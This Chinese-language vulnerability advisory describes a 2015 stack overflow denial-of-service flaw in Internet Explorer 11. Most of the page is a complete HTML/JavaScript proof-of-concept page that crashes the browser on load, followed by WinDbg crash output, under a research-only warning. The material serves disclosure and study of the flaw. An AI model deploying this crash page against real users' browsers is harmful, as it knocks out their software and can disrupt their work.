Microsoft Internet Explorer 11 栈溢出拒绝服务漏洞

Microsoft Internet Explorer 11 栈溢出拒绝服务漏洞


发布日期:2015-09-11
更新日期:2015-10-09

受影响系统:

Microsoft Internet Explorer 11

描述:

BUGTRAQ  ID: 76651

Internet Explorer是微软公司推出的一款网页浏览器。

Microsoft Internet Explorer 11在实现上存在远程拒绝服务漏洞,攻击者利用此漏洞可造成受影响应用崩溃。

<*来源:Mjx
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<!--
# Exploit title: Microsoft Internet Explorer 11 Stack Underflow Crash PoC
# Date: 09.11.2015
# Vulnerable version: 11 (32bit version)(newest at the time 11.0.9600.17843 and 11.0.10240.16431)
# Tested on: Windows 7 64bit  and Windows 10(10240) 64bit
# Author: Mjx
# ://jinxin.pen.io/
-->
& lt;!doctype html&gt;
& lt;html&gt;
    &lt;head&gt;
        &lt;meta http-equiv=&#39;Cache-Control&#39; content=&#39;no-cache&#39;/&gt;
   
        &lt;title&gt;crash IE 11&lt;/title&gt;
        &lt;style&gt;&lt;/style&gt;
        &lt;script type=&#39;text/javascript&#39; &gt;&lt;/script&gt;
        &lt;script&gt;
           
            function crash()
            {
                var id_0 = null;
                id_0 = document.createElement( &#39;THEAD&#39; );
                document.body.appendChild( id_0 );
                elemTree = [];
                elemTree[0]= document.createElement(&#39;SELECT&#39;);
                document.all[7].appendChild(elemTree[0]);
                elemTree[1]= document.createElement(&#39;B&#39;);
                document.all[8].appendChild(elemTree[1]);
                elemTree[2]= document.createElement(&#39;SOURCE&#39;);
                document.all[0].appendChild(elemTree[2]);
                elemTree[3]= document.createElement(&#39;HR&#39;);
                document.all[8].appendChild(elemTree[3]);
                elemTree[3].setAttribute(&#39;hidden&#39;, -4400000000);
                elemTree[4]= document.createElement(&#39;SELECT&#39;);
                document.all[9].appendChild(elemTree[4]);     
                elemTree[5]= document.createElement(&#39;RUBY&#39;);
                document.all[2].appendChild(elemTree[5]);     
                elemTree[6]= document.createElement(&#39;OL&#39;);
                document.all[4].appendChild(elemTree[6]);     
                elemTree[7]= document.createElement(&#39;AREA&#39;);
                document.all[6].appendChild(elemTree[7]);             
                elemTree[8]= document.createElement(&#39;ARTICLE&#39;);
                document.all[3].appendChild(elemTree[8]);
                elemTree[9]= document.createElement(&#39;TEXTAREA&#39;);
                document.all[1].appendChild(elemTree[9]);
                txtRange = document.body.createTextRange();
                txtRange.moveEnd(&#39;character&#39;, 14);
                txtRange.select();
                txtRange.execCommand(&#39;insertUnorderedList&#39;,true,null);           
                txtRange = document.body.createTextRange();
                txtRange.moveEnd(&#39;sentence&#39;, 4);
                txtRange.select();
                txtRange.execCommand(&#39;insertOrderedList&#39;,true,null);
           
            }
        &lt;/script&gt;
    &lt;/head&gt;
    &lt;body onload=&#39;crash();&#39;&gt;
       
    &lt;/body&gt;
& lt;/html&gt;

& lt;!--
(1428.1230): Stack overflow - code c00000fd (!!! second chance !!!)
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0        nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b            efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50              push    eax
0:008&gt; kb
ChildEBP RetAddr  Args to Child             
09ab3004 5fd16800 09ab319c 09ab31a0 00001000 verifier!AVrfpDphAllocateVm+0x9
09ab3184 5fd16a8d 09ab319c 09ab31a0 00000004 verifier!DphCommitMemoryForPageHeap+0xf0
09ab31ac 5fd18e5d 000f1000 47de0068 00000000 verifier!AVrfpDphSetProtectionsBeforeUse+0x8d
09ab31dc 77cf0d96 000f0000 01000002 00000028 verifier!AVrfDebugPageHeapAllocate+0x1fd
0:008&gt; r
eax=00000004 ebx=000f0000 ecx=09ab319c edx=00000004 esi=47ce6fd8 edi=00000000
eip=5fd166d9 esp=09ab3000 ebp=09ab3004 iopl=0        nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b            efl=00010202
verifier!AVrfpDphAllocateVm+0x9:
5fd166d9 50              push    eax
0:008&gt; !vprot esp-4
BaseAddress:      09ab2000
AllocationBase:    09ab0000
AllocationProtect: 00000004  PAGE_READWRITE
RegionSize:        001fe000
State:            00001000  MEM_COMMIT
Protect:          00000004  PAGE_READWRITE
Type:              00020000  MEM_PRIVATE


-->

建议:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/88861878407ae11f9a2a2d9100097168.html